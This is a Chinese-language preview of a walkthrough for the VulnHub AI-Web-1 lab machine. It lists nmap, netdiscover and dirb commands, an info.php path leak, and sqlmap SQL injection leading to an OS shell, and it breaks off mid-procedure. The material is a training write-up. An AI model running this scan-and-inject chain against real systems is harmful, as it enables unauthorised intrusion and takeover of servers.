文章预览
本周实践的是vulnhub的AI-Web-1镜像, 下载地址,https://download.vulnhub.com/aiweb/AI-Web-1.0.7z, 用workstation导入成功, 做地址扫描,sudo netdiscover -r 192.168.220.0/24, 获取到靶机地址是192.168.220.168, 接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.220.168, 发现靶机有80端口的http服务,以及两个路径, /m3diNf0和/se3reTdir777/uploads, 对/m3diNf0进一步做路径暴破, dirb http://192.168.220.168/m3diNf0, 发现http://192.168.220.168/m3diNf0/info.php, 浏览器访问http://192.168.220.168/m3diNf0/info.php, 获取到/home/www/html/web1x443290o2sdf92213, 浏览器访问http://192.168.220.168/se3reTdir777, 发现可以做sql暴破, 上burpsuite,截获请求数据,保存在文件中,req.txt, 暴破数据库,sqlmap -r req.txt --dbs --batch,获取到aiweb1, 获取os-shell,sqlmap -r req.txt -D aiweb1 --os-shell, 其中一步输入的是/home/www/html/web1x443290o2sdf92213/se3reTdir777
………………………………